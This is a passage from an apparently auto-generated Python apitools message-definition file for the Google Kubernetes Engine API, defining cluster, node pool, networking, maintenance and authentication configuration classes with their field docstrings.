[zone](/compute/docs/zones#available) to return operations for. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class ContainerProjectsZonesOperationsGetRequest(_messages.Message):
r"""A ContainerProjectsZonesOperationsGetRequest object.
Fields:
name: The name (project, location, operation id) of the operation to get.
Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
operationId = _messages.StringField(2, required=True)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesOperationsListRequest(_messages.Message):
r"""A ContainerProjectsZonesOperationsListRequest object.
Fields:
parent: The parent (project and location) where the operations will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for, or `-`
for all zones. This field has been deprecated and replaced by the parent
field.
"""
parent = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class CostManagementConfig(_messages.Message):
r"""Configuration for fine-grained cost management feature.
Fields:
enabled: Whether the feature is enabled or not.
"""
enabled = _messages.BooleanField(1)
class CreateClusterRequest(_messages.Message):
r"""CreateClusterRequest creates a cluster.
Fields:
cluster: A [cluster resource](/container-
engine/reference/rest/v1alpha1/projects.zones.clusters)
parent: The parent (project and location) where the cluster will be
created. Specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
cluster = _messages.MessageField('Cluster', 1)
parent = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class CreateNodePoolRequest(_messages.Message):
r"""CreateNodePoolRequest creates a node pool for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
nodePool: The node pool to create.
parent: The parent (project, location, cluster id) where the node pool
will be created. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1)
nodePool = _messages.MessageField('NodePool', 2)
parent = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class CustomImageConfig(_messages.Message):
r"""CustomImageConfig contains the information
Fields:
image: The name of the image to use for this node.
imageFamily: The name of the image family to use for this node.
imageProject: The project containing the image to use for this node.
"""
image = _messages.StringField(1)
imageFamily = _messages.StringField(2)
imageProject = _messages.StringField(3)
class DailyMaintenanceWindow(_messages.Message):
r"""Time window specified for daily maintenance operations.
Fields:
duration: [Output only] Duration of the time window, automatically chosen
to be smallest possible in the given scenario.
startTime: Time within the maintenance window to start the maintenance
operations. It must be in format "HH:MM", where HH : [00-23] and MM :
[00-59] GMT.
"""
duration = _messages.StringField(1)
startTime = _messages.StringField(2)
class DatabaseEncryption(_messages.Message):
r"""Configuration of etcd encryption.
Enums:
StateValueValuesEnum: Denotes the state of etcd encryption.
Fields:
keyName: Name of CloudKMS key to use for the encryption of secrets in
etcd. Ex. projects/my-project/locations/global/keyRings/my-
ring/cryptoKeys/my-key
state: Denotes the state of etcd encryption.
"""
class StateValueValuesEnum(_messages.Enum):
r"""Denotes the state of etcd encryption.
Values:
UNKNOWN: Should never be set
ENCRYPTED: Secrets in etcd are encrypted.
DECRYPTED: Secrets in etcd are stored in plain text (at etcd level) -
this is unrelated to Google Compute Engine level full disk encryption.
"""
UNKNOWN = 0
ENCRYPTED = 1
DECRYPTED = 2
keyName = _messages.StringField(1)
state = _messages.EnumField('StateValueValuesEnum', 2)
class DefaultSnatStatus(_messages.Message):
r"""DefaultSnatStatus contains the desired state of whether default sNAT
should be disabled on the cluster.
Fields:
disabled: Disables cluster default sNAT rules.
"""
disabled = _messages.BooleanField(1)
class DnsCacheConfig(_messages.Message):
r"""Configuration for NodeLocal DNSCache
Fields:
enabled: Whether NodeLocal DNSCache is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo {
rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The
JSON representation for `Empty` is empty JSON object `{}`.
"""
class FeatureConfig(_messages.Message):
r"""FeatureConfig is the configuration for a specific feature including the
definition of the feature as well as the tier in which it resides.
Enums:
FeatureValueValuesEnum: The feature that is being configured with this
value.
TierValueValuesEnum: The tier in which the configured feature resides.
Fields:
feature: The feature that is being configured with this value.
tier: The tier in which the configured feature resides.
"""
class FeatureValueValuesEnum(_messages.Enum):
r"""The feature that is being configured with this value.
Values:
DEFAULT_FEATURE: DEFAULT_FEATURE is the default zero value of the
Feature. This value is valid.
VERTICAL_POD_AUTOSCALER: The vertical pod autoscaling feature.
NODE_AUTO_PROVISIONING: The node auto provisioning feature.
BINARY_AUTHORIZATION: The binary authorization feature.
RESOURCE_LABELS: The resource labels feature.
USAGE_METERING: The GKE usage metering feature.
CLOUD_RUN_ON_GKE: The Cloud Run on GKE feature.
"""
DEFAULT_FEATURE = 0
VERTICAL_POD_AUTOSCALER = 1
NODE_AUTO_PROVISIONING = 2
BINARY_AUTHORIZATION = 3
RESOURCE_LABELS = 4
USAGE_METERING = 5
CLOUD_RUN_ON_GKE = 6
class TierValueValuesEnum(_messages.Enum):
r"""The tier in which the configured feature resides.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
feature = _messages.EnumField('FeatureValueValuesEnum', 1)
tier = _messages.EnumField('TierValueValuesEnum', 2)
class GcePersistentDiskCsiDriverConfig(_messages.Message):
r"""Configuration for the GCE PD CSI driver. This option can only be enabled
at cluster creation time.
Fields:
enabled: Whether the GCE PD CSI driver is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class GetJSONWebKeysResponse(_messages.Message):
r"""GetJSONWebKeysResponse is a valid JSON Web Key Set as specififed in rfc
7517
Fields:
cacheHeader: OnePlatform automagically extracts this field and uses it to
set the HTTP Cache-Control header.
keys: The public component of the keys used by the cluster to sign token
requests.
"""
cacheHeader = _messages.MessageField('HttpCacheControlResponseHeader', 1)
keys = _messages.MessageField('Jwk', 2, repeated=True)
class GetOpenIDConfigResponse(_messages.Message):
r"""GetOpenIDConfigResponse is an OIDC discovery document for the cluster.
See the OpenID Connect Discovery 1.0 specification for details.
Fields:
cacheHeader: OnePlatform automagically extracts this field and uses it to
set the HTTP Cache-Control header.
claims_supported: Supported claims.
grant_types: Supported grant types.
id_token_signing_alg_values_supported: supported ID Token signing
Algorithms.
issuer: OIDC Issuer.
jwks_uri: JSON Web Key uri.
response_types_supported: Supported response types.
subject_types_supported: Supported subject types.
"""
cacheHeader = _messages.MessageField('HttpCacheControlResponseHeader', 1)
claims_supported = _messages.StringField(2, repeated=True)
grant_types = _messages.StringField(3, repeated=True)
id_token_signing_alg_values_supported = _messages.StringField(4, repeated=True)
issuer = _messages.StringField(5)
jwks_uri = _messages.StringField(6)
response_types_supported = _messages.StringField(7, repeated=True)
subject_types_supported = _messages.StringField(8, repeated=True)
class HorizontalPodAutoscaling(_messages.Message):
r"""Configuration options for the horizontal pod autoscaling feature, which
increases or decreases the number of replica pods a replication controller
has based on the resource usage of the existing pods.
Fields:
disabled: Whether the Horizontal Pod Autoscaling feature is enabled in the
cluster. When enabled, it ensures that metrics are collected into
Stackdriver Monitoring.
"""
disabled = _messages.BooleanField(1)
class HttpCacheControlResponseHeader(_messages.Message):
r"""RFC-2616: cache control support
Fields:
age: 14.6 response cache age, in seconds since the response is generated
directive: 14.9 request and response directives
expires: 14.21 response cache expires, in RFC 1123 date format
"""
age = _messages.IntegerField(1)
directive = _messages.StringField(2)
expires = _messages.StringField(3)
class HttpLoadBalancing(_messages.Message):
r"""Configuration options for the HTTP (L7) load balancing controller addon,
which makes it easy to set up HTTP load balancers for services in a cluster.
Fields:
disabled: Whether the HTTP Load Balancing controller is enabled in the
cluster. When enabled, it runs a small pod in the cluster that manages
the load balancers.
"""
disabled = _messages.BooleanField(1)
class IPAllocationPolicy(_messages.Message):
r"""Configuration for controlling how IPs are allocated in the cluster.
Fields:
allowRouteOverlap: If true, allow allocation of cluster CIDR ranges that
overlap with certain kinds of network routes. By default we do not allow
cluster CIDR ranges to intersect with any user declared routes. With
allow_route_overlap == true, we allow overlapping with CIDR ranges that
are larger than the cluster CIDR range. If this field is set to true,
then cluster and services CIDRs must be fully-specified (e.g.
`10.96.0.0/14`, but not `/14`), which means: 1) When `use_ip_aliases` is
true, `cluster_ipv4_cidr_block` and `services_ipv4_cidr_block` must
be fully-specified. 2) When `use_ip_aliases` is false,
`cluster.cluster_ipv4_cidr` muse be fully-specified.
clusterIpv4Cidr: This field is deprecated, use cluster_ipv4_cidr_block.
clusterIpv4CidrBlock: The IP address range for the cluster pod IPs. If
this field is set, then `cluster.cluster_ipv4_cidr` must be left blank.
This field is only applicable when `use_ip_aliases` is true. Set to
blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
clusterSecondaryRangeName: The name of the secondary range to be used for
the cluster CIDR block. The secondary range will be used for pod IP
addresses. This must be an existing secondary range associated with the
cluster subnetwork. This field is only applicable if use_ip_aliases is
true and create_subnetwork is false.
createSubnetwork: Whether a new subnetwork will be created automatically
for the cluster. This field is only applicable when `use_ip_aliases` is
true.
nodeIpv4Cidr: This field is deprecated, use node_ipv4_cidr_block.
nodeIpv4CidrBlock: The IP address range of the instance IPs in this
cluster. This is applicable only if `create_subnetwork` is true. Set
to blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
servicesIpv4Cidr: This field is deprecated, use services_ipv4_cidr_block.
servicesIpv4CidrBlock: The IP address range of the services IPs in this
cluster. If blank, a range will be automatically chosen with the default
size. This field is only applicable when `use_ip_aliases` is true. Set
to blank to have a range chosen with the default size. Set to /netmask
(e.g. `/14`) to have a range chosen with a specific netmask. Set to a
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `10.96.0.0/14`) from the RFC-1918 private networks (e.g.
`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick a specific
range to use.
servicesSecondaryRangeName: The name of the secondary range to be used as
for the services CIDR block. The secondary range will be used for
service ClusterIPs. This must be an existing secondary range associated
with the cluster subnetwork. This field is only applicable with
use_ip_aliases is true and create_subnetwork is false.
subnetworkName: A custom subnetwork name to be used if `create_subnetwork`
is true. If this field is empty, then an automatic name will be chosen
for the new subnetwork.
tpuIpv4CidrBlock: The IP address range of the Cloud TPUs in this cluster.
If unspecified, a range will be automatically chosen with the default
size. This field is only applicable when `use_ip_aliases` is true, and
it must not be specified when the `tpu_use_service_networking` is
`true`. Unspecified to have a range chosen with the default size `/20`.
Set to /netmask (e.g. `/14`) to have a range chosen with a specific
netmask. Set to a [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `10.96.0.0/14`) from the RFC-1918 private
networks (e.g. `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`) to pick
a specific range to use.
tpuUseServiceNetworking: Enable Cloud TPU's Service Networking mode. In
this mode, the CIDR blocks used by the Cloud TPUs will be allocated and
managed by Service Networking, instead of GKE. This field must be
`false` when `tpu_ipv4_cidr_block` is specified.
useIpAliases: Whether alias IPs will be used for pod IPs in the cluster.
This is used in conjunction with use_routes. It cannot be true if
use_routes is true. If both use_ip_aliases and use_routes are false,
then the server picks the default IP allocation mode
"""
allowRouteOverlap = _messages.BooleanField(1)
clusterIpv4Cidr = _messages.StringField(2)
clusterIpv4CidrBlock = _messages.StringField(3)
clusterSecondaryRangeName = _messages.StringField(4)
createSubnetwork = _messages.BooleanField(5)
nodeIpv4Cidr = _messages.StringField(6)
nodeIpv4CidrBlock = _messages.StringField(7)
servicesIpv4Cidr = _messages.StringField(8)
servicesIpv4CidrBlock = _messages.StringField(9)
servicesSecondaryRangeName = _messages.StringField(10)
subnetworkName = _messages.StringField(11)
tpuIpv4CidrBlock = _messages.StringField(12)
tpuUseServiceNetworking = _messages.BooleanField(13)
useIpAliases = _messages.BooleanField(14)
class IntraNodeVisibilityConfig(_messages.Message):
r"""IntraNodeVisibilityConfig contains the desired config of the intra-node
visibility on this cluster.
Fields:
enabled: Enables intra node visibility for this cluster.
"""
enabled = _messages.BooleanField(1)
class IstioConfig(_messages.Message):
r"""Configuration options for Istio addon.
Enums:
AuthValueValuesEnum: The specified Istio auth mode, either none, or mutual
TLS.
Fields:
auth: The specified Istio auth mode, either none, or mutual TLS.
csmMeshName: DEPRECATED: No longer used.
disabled: Whether Istio is enabled for this cluster.
"""
class AuthValueValuesEnum(_messages.Enum):
r"""The specified Istio auth mode, either none, or mutual TLS.
Values:
AUTH_NONE: auth not enabled
AUTH_MUTUAL_TLS: auth mutual TLS enabled
"""
AUTH_NONE = 0
AUTH_MUTUAL_TLS = 1
auth = _messages.EnumField('AuthValueValuesEnum', 1)
csmMeshName = _messages.StringField(2)
disabled = _messages.BooleanField(3)
class Jwk(_messages.Message):
r"""Jwk is a JSON Web Key as specified in RFC 7517
Fields:
alg: Algorithm.
crv: Used for ECDSA keys.
e: Used for RSA keys.
kid: Key ID.
kty: Key Type.
n: Used for RSA keys.
use: Permitted uses for the public keys.
x: Used for ECDSA keys.
y: Used for ECDSA keys.
"""
alg = _messages.StringField(1)
crv = _messages.StringField(2)
e = _messages.StringField(3)
kid = _messages.StringField(4)
kty = _messages.StringField(5)
n = _messages.StringField(6)
use = _messages.StringField(7)
x = _messages.StringField(8)
y = _messages.StringField(9)
class KalmConfig(_messages.Message):
r"""Configuration options for the KALM addon.
Fields:
enabled: Whether KALM is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class KubernetesDashboard(_messages.Message):
r"""Configuration for the Kubernetes Dashboard.
Fields:
disabled: Whether the Kubernetes Dashboard is enabled for this cluster.
"""
disabled = _messages.BooleanField(1)
class LegacyAbac(_messages.Message):
r"""Configuration for the legacy Attribute Based Access Control
authorization mode.
Fields:
enabled: Whether the ABAC authorizer is enabled for this cluster. When
enabled, identities in the system, including service accounts, nodes,
and controllers, will have statically granted permissions beyond those
provided by the RBAC configuration or IAM.
"""
enabled = _messages.BooleanField(1)
class LinuxNodeConfig(_messages.Message):
r"""Parameters that can be configured on Linux nodes.
Messages:
SysctlsValue: The Linux kernel parameters to be applied to the nodes and
all pods running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries
net.ipv4.tcp_tw_reuse net.ipv4.udp_mem net.ipv4.udp_rmem_min
net.ipv4.udp_wmem_min net.netfilter.nf_conntrack_generic_timeout
net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
Fields:
sysctls: The Linux kernel parameters to be applied to the nodes and all
pods running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries
net.ipv4.tcp_tw_reuse net.ipv4.udp_mem net.ipv4.udp_rmem_min
net.ipv4.udp_wmem_min net.netfilter.nf_conntrack_generic_timeout
net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class SysctlsValue(_messages.Message):
r"""The Linux kernel parameters to be applied to the nodes and all pods
running on the nodes. The following parameters are supported.
kernel.pid_max kernel.threads-max fs.inotify.max_queued_events
fs.inotify.max_user_instances fs.inotify.max_user_watches
net.core.netdev_budget net.core.netdev_budget_usecs
net.core.netdev_max_backlog net.core.rmem_default net.core.rmem_max
net.core.wmem_default net.core.wmem_max net.core.optmem_max
net.core.somaxconn net.ipv4.tcp_rmem net.ipv4.tcp_wmem net.ipv4.tcp_mem
net.ipv4.tcp_fin_timeout net.ipv4.tcp_keepalive_intvl
net.ipv4.tcp_keepalive_probes net.ipv4.tcp_keepalive_time
net.ipv4.tcp_max_orphans net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_tw_buckets net.ipv4.tcp_syn_retries net.ipv4.tcp_tw_reuse
net.ipv4.udp_mem net.ipv4.udp_rmem_min net.ipv4.udp_wmem_min
net.netfilter.nf_conntrack_generic_timeout net.netfilter.nf_conntrack_max
net.netfilter.nf_conntrack_tcp_timeout_close_wait
net.netfilter.nf_conntrack_tcp_timeout_established
Messages:
AdditionalProperty: An additional property for a SysctlsValue object.
Fields:
additionalProperties: Additional properties of type SysctlsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a SysctlsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
sysctls = _messages.MessageField('SysctlsValue', 1)
class ListClustersResponse(_messages.Message):
r"""ListClustersResponse is the result of ListClustersRequest.
Fields:
clusters: A list of clusters in the project in the specified zone, or
across all ones.
missingZones: If any zones are listed here, the list of clusters returned
may be missing those zones.
"""
clusters = _messages.MessageField('Cluster', 1, repeated=True)
missingZones = _messages.StringField(2, repeated=True)
class ListLocationsResponse(_messages.Message):
r"""ListLocationsResponse returns the list of all GKE locations and their
recommendation state.
Fields:
locations: A full list of GKE locations.
nextPageToken: Only return ListLocationsResponse that occur after the
page_token. This value should be populated from the
ListLocationsResponse.next_page_token if that response token was set
(which happens when listing more Locations than fit in a single
ListLocationsResponse). This is currently not used and will be honored
once we use pagination.
"""
locations = _messages.MessageField('Location', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class ListNodePoolsResponse(_messages.Message):
r"""ListNodePoolsResponse is the result of ListNodePoolsRequest.
Fields:
nodePools: A list of node pools for a cluster.
"""
nodePools = _messages.MessageField('NodePool', 1, repeated=True)
class ListOperationsResponse(_messages.Message):
r"""ListOperationsResponse is the result of ListOperationsRequest.
Fields:
missingZones: If any zones are listed here, the list of operations
returned may be missing the operations from those zones.
operations: A list of operations in the project in the specified zone.
"""
missingZones = _messages.StringField(1, repeated=True)
operations = _messages.MessageField('Operation', 2, repeated=True)
class ListUsableSubnetworksResponse(_messages.Message):
r"""ListUsableSubnetworksResponse is the response of
ListUsableSubnetworksRequest.
Fields:
nextPageToken: This token allows you to get the next page of results for
list requests. If the number of results is larger than `page_size`, use
the `next_page_token` as a value for the query parameter `page_token` in
the next request. The value will become empty when there are no more
pages.
subnetworks: A list of usable subnetworks in the specified network
project.
"""
nextPageToken = _messages.StringField(1)
subnetworks = _messages.MessageField('UsableSubnetwork', 2, repeated=True)
class LocalSsdVolumeConfig(_messages.Message):
r"""LocalSsdVolumeConfig is comprised of three fields, count, type, and
format. Count is the number of ssds of this grouping requested, type is the
interface type and is either nvme or scsi, and format is whether the disk is
to be formatted with a filesystem or left for block storage
Enums:
FormatValueValuesEnum: Format of the local SSD (fs/block).
Fields:
count: Number of local SSDs to use
format: Format of the local SSD (fs/block).
type: Local SSD interface to use (nvme/scsi).
"""
class FormatValueValuesEnum(_messages.Enum):
r"""Format of the local SSD (fs/block).
Values:
FORMAT_UNSPECIFIED: Default value
FS: File system formatted
BLOCK: Raw block
"""
FORMAT_UNSPECIFIED = 0
FS = 1
BLOCK = 2
count = _messages.IntegerField(1, variant=_messages.Variant.INT32)
format = _messages.EnumField('FormatValueValuesEnum', 2)
type = _messages.StringField(3)
class Location(_messages.Message):
r"""Location returns the location name, and if the location is recommended
for GKE cluster scheduling.
Enums:
TypeValueValuesEnum: Contains the type of location this Location is for.
Regional or Zonal.
Fields:
name: Contains the name of the resource requested. Specified in the format
'projects/*/locations/*'.
recommended: Recommended is a bool combining the drain state of the
location (ie- has the region been drained manually?), and the stockout
status of any zone according to Zone Advisor. This will be internal only
for use by pantheon.
type: Contains the type of location this Location is for. Regional or
Zonal.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Contains the type of location this Location is for. Regional or Zonal.
Values:
LOCATION_TYPE_UNSPECIFIED: LOCATION_TYPE_UNSPECIFIED means the location
type was not determined.
ZONE: A GKE Location where Zonal clusters can be created.
REGION: A GKE Location where Regional clusters can be created.
"""
LOCATION_TYPE_UNSPECIFIED = 0
ZONE = 1
REGION = 2
name = _messages.StringField(1)
recommended = _messages.BooleanField(2)
type = _messages.EnumField('TypeValueValuesEnum', 3)
class MaintenancePolicy(_messages.Message):
r"""MaintenancePolicy defines the maintenance policy to be used for the
cluster.
Fields:
resourceVersion: A hash identifying the version of this policy, so that
updates to fields of the policy won't accidentally undo intermediate
changes (and so that users of the API unaware of some fields won't
accidentally remove other fields). Make a <code>get()</code> request to
the cluster to get the current resource version and include it with
requests to set the policy.
window: Specifies the maintenance window in which maintenance may be
performed.
"""
resourceVersion = _messages.StringField(1)
window = _messages.MessageField('MaintenanceWindow', 2)
class MaintenanceWindow(_messages.Message):
r"""MaintenanceWindow defines the maintenance window to be used for the
cluster.
Messages:
MaintenanceExclusionsValue: Exceptions to maintenance window. Non-
emergency maintenance should not occur in these windows.
Fields:
dailyMaintenanceWindow: DailyMaintenanceWindow specifies a daily
maintenance operation window.
maintenanceExclusions: Exceptions to maintenance window. Non-emergency
maintenance should not occur in these windows.
recurringWindow: RecurringWindow specifies some number of recurring time
periods for maintenance to occur. The time windows may be overlapping.
If no maintenance windows are set, maintenance can occur at any time.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class MaintenanceExclusionsValue(_messages.Message):
r"""Exceptions to maintenance window. Non-emergency maintenance should not
occur in these windows.
Messages:
AdditionalProperty: An additional property for a
MaintenanceExclusionsValue object.
Fields:
additionalProperties: Additional properties of type
MaintenanceExclusionsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MaintenanceExclusionsValue object.
Fields:
key: Name of the additional property.
value: A TimeWindow attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('TimeWindow', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
dailyMaintenanceWindow = _messages.MessageField('DailyMaintenanceWindow', 1)
maintenanceExclusions = _messages.MessageField('MaintenanceExclusionsValue', 2)
recurringWindow = _messages.MessageField('RecurringTimeWindow', 3)
class MasterAuth(_messages.Message):
r"""The authentication information for accessing the master endpoint.
Authentication can be done using HTTP basic auth or using client
certificates.
Fields:
clientCertificate: [Output only] Base64-encoded public certificate used by
clients to authenticate to the cluster endpoint.
clientCertificateConfig: Configuration for client certificate
authentication on the cluster. For clusters before v1.12, if no
configuration is specified, a client certificate is issued.
clientKey: [Output only] Base64-encoded private key used by clients to
authenticate to the cluster endpoint.
clusterCaCertificate: [Output only] Base64-encoded public certificate that
is the root of trust for the cluster.
password: The password to use for HTTP basic authentication to the master
endpoint. Because the master endpoint is open to the Internet, you
should create a strong password. If a password is provided for cluster
creation, username must be non-empty.
username: The username to use for HTTP basic authentication to the master
endpoint. For clusters v1.6.0 and later, basic authentication can be
disabled by leaving username unspecified (or setting it to the empty
string).
"""
clientCertificate = _messages.StringField(1)
clientCertificateConfig = _messages.MessageField('ClientCertificateConfig', 2)
clientKey = _messages.StringField(3)
clusterCaCertificate = _messages.StringField(4)
password = _messages.StringField(5)
username = _messages.StringField(6)
class MasterAuthorizedNetworksConfig(_messages.Message):
r"""Configuration options for the master authorized networks feature.
Enabled master authorized networks will disallow all external traffic to
access Kubernetes master through HTTPS except traffic from the given CIDR
blocks, Google Compute Engine Public IPs and Google Prod IPs.
Fields:
cidrBlocks: cidr_blocks define up to 50 external networks that could
access Kubernetes master through HTTPS.
enabled: Whether or not master authorized networks is enabled.
"""
cidrBlocks = _messages.MessageField('CidrBlock', 1, repeated=True)
enabled = _messages.BooleanField(2)
class MaxPodsConstraint(_messages.Message):
r"""Constraints applied to pods.
Fields:
maxPodsPerNode: Constraint enforced on the max num of pods per node.
"""
maxPodsPerNode = _messages.IntegerField(1)
class Metric(_messages.Message):
r"""Progress metric is (string, int|float|string) pair.
Fields:
doubleValue: For metrics with floating point value.
intValue: For metrics with integer value.
name: Required. Metric name, e.g., "nodes total", "percent done".
stringValue: For metrics with custom values (ratios, visual progress,
etc.).
"""
doubleValue = _messages.FloatField(1)
intValue = _messages.IntegerField(2)
name = _messages.StringField(3)
stringValue = _messages.StringField(4)
class NetworkConfig(_messages.Message):
r"""Parameters for cluster networking.
Fields:
disableDefaultSnat: Whether the cluster disables default in-node sNAT
rules. In-node sNAT rules will be disabled when this flag is true. When
set to false, default IP masquerade rules will be applied to the nodes
to prevent sNAT on cluster internal traffic. Deprecated. Use
default_snat_status instead
enableCloudNat: Whether GKE Cloud NAT is enabled for this cluster.
Requires that the cluster has already set
IPAllocationPolicy.use_ip_aliases to true. Deprecated: use
disable_default_snat instead.
enableIntraNodeVisibility: Whether Intra-node visibility is enabled for
this cluster. This enables flow logs for same node pod to pod traffic.
enablePrivateIpv6Access: Whether or not Private IPv6 access is enabled.
This enables direct connectivity from GKE pods to Google Cloud services
over gRPC.
enableSharedNetwork: Deprecated: This flag doesn't need to be flipped for
using shared VPC and it has no effect.
network: Output only. The relative name of the Google Compute Engine
network(/compute/docs/networks-and-firewalls#networks) to which the
cluster is connected. Example: projects/my-project/global/networks/my-
network
subnetwork: Output only. The relative name of the Google Compute Engine
[subnetwork](/compute/docs/vpc) to which the cluster is connected.
Example: projects/my-project/regions/us-central1/subnetworks/my-subnet
"""
disableDefaultSnat = _messages.BooleanField(1)
enableCloudNat = _messages.BooleanField(2)
enableIntraNodeVisibility = _messages.BooleanField(3)
enablePrivateIpv6Access = _messages.BooleanField(4)
enableSharedNetwork = _messages.BooleanField(5)
network = _messages.StringField(6)
subnetwork = _messages.StringField(7)
class NetworkPolicy(_messages.Message):
r"""Configuration options for the NetworkPolicy feature.
https://kubernetes.io/docs/concepts/services-networking/networkpolicies/
Enums:
ProviderValueValuesEnum: The selected network policy provider.
Fields:
enabled: Whether network policy is enabled on the cluster.
provider: The selected network policy provider.
"""
class ProviderValueValuesEnum(_messages.Enum):
r"""The selected network policy provider.
Values:
PROVIDER_UNSPECIFIED: Not set
CALICO: Tigera (Calico Felix).
"""
PROVIDER_UNSPECIFIED = 0
CALICO = 1
enabled = _messages.BooleanField(1)
provider = _messages.EnumField('ProviderValueValuesEnum', 2)
class NetworkPolicyConfig(_messages.Message):
r"""Configuration for NetworkPolicy. This only tracks whether the addon is
enabled or not on the Master, it does not track whether network policy is
enabled for the nodes.
Fields:
disabled: Whether NetworkPolicy is enabled for this cluster.
"""
disabled = _messages.BooleanField(1)
class NodeConfig(_messages.Message):
r"""Parameters that describe the nodes in a cluster.
Messages:
LabelsValue: The map of Kubernetes labels (key/value pairs) to be applied
to each node. These will added in addition to any default label(s) that
Kubernetes may apply to the node. In case of conflict in label keys, the
applied set may differ depending on the Kubernetes version -- it's best
to assume the behavior is undefined and conflicts should be avoided. For
more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-
objects/labels/
